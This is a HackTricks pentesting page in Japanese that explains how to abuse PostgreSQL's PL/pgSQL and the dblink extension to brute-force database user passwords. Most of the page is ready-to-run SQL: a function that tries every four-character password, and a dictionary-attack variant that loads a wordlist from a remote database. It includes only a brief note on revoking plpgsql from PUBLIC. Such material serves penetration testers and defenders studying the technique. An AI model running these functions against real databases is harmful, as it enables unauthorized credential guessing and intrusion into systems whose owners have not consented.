PL/pgSQL Password Bruteforce

htARTE（HackTricks AWS Red Team Expert） でAWSハッキングをゼロからヒーローまで学ぶ！

サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝してみたいですか？または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
The PEASS Familyを発見し、独占的なNFTsコレクションをご覧ください
公式PEASS＆HackTricksスウェグを手に入れましょう
💬 Discordグループに参加するか、telegramグループに参加するか、またはTwitterで 🐦@carlospolopmをフォローしてください。
ハッキングトリックを共有するために、 hacktricksリポジトリ と hacktricks-cloudリポジトリ にPRを提出してください。

PL/pgSQLは、SQLの機能を拡張し、強化された手続き制御を提供することで、完全な機能を備えたプログラミング言語です。これには、ループやさまざまな制御構造の利用が含まれます。PL/pgSQL言語で作成された関数は、SQLステートメントやトリガーによって呼び出すことができ、データベース環境内での操作の範囲を広げます。

この言語を悪用して、PostgreSQLにユーザーの資格情報をブルートフォースさせることができますが、それはデータベース上に存在する必要があります。その存在を確認するには、次のようにします：

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+---------
plpgsql |

デフォルトでは、関数の作成権限はPUBLICに付与されます。ここでのPUBLICはそのデータベースシステムのすべてのユーザを指します。これを防ぐために、管理者はPUBLICドメインからUSAGE権限を取り消す必要があります：

REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;

その場合、前回のクエリは異なる結果を出力します：

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+-----------------
plpgsql | {admin=U/admin}

次のスクリプトが機能するには、dblink 関数が存在する必要があります。存在しない場合は、以下のように作成してみることができます。

CREATE EXTENSION dblink;

パスワードブルートフォース

以下は、4文字のパスワードブルートフォースを実行する方法です：

//Create the brute-force function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
word TEXT;
BEGIN
FOR a IN 65..122 LOOP
FOR b IN 65..122 LOOP
FOR c IN 65..122 LOOP
FOR d IN 65..122 LOOP
BEGIN
word := chr(a) || chr(b) || chr(c) || chr(d);
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;
EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection
THEN
-- do nothing
END;
END LOOP;
END LOOP;
END LOOP;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql';

//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');

4文字の総当たり攻撃でも数分かかる場合があります。

ワードリストをダウンロードして、そのパスワードのみを試すこともできます（辞書攻撃）:

//Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
BEGIN
FOR word IN (SELECT word FROM dblink('host=1.2.3.4
user=name
password=qwerty
dbname=wordlists',
'SELECT word FROM wordlist')
RETURNS (word TEXT)) LOOP
BEGIN
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;

EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection THEN
-- do nothing
END;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql'

-- Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');

ゼロからヒーローまでAWSハッキングを学ぶ htARTE（HackTricks AWS Red Team Expert）！

サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝してみたいですか？または、最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
The PEASS Familyを発見し、独占的なNFTsコレクションをご覧ください
公式PEASS＆HackTricksスウェグを手に入れましょう
💬 Discordグループに参加するか、telegramグループに参加するか、Twitterで私をフォローする🐦@carlospolopm。
ハッキングテクニックを共有するためにPRを hacktricks repo と hacktricks-cloud repo に提出してください。

Previousdblink/lo_import data exfiltration NextNetwork - Privesc, Port Scanner and NTLM chanllenge response disclosure

Last updated 3 months ago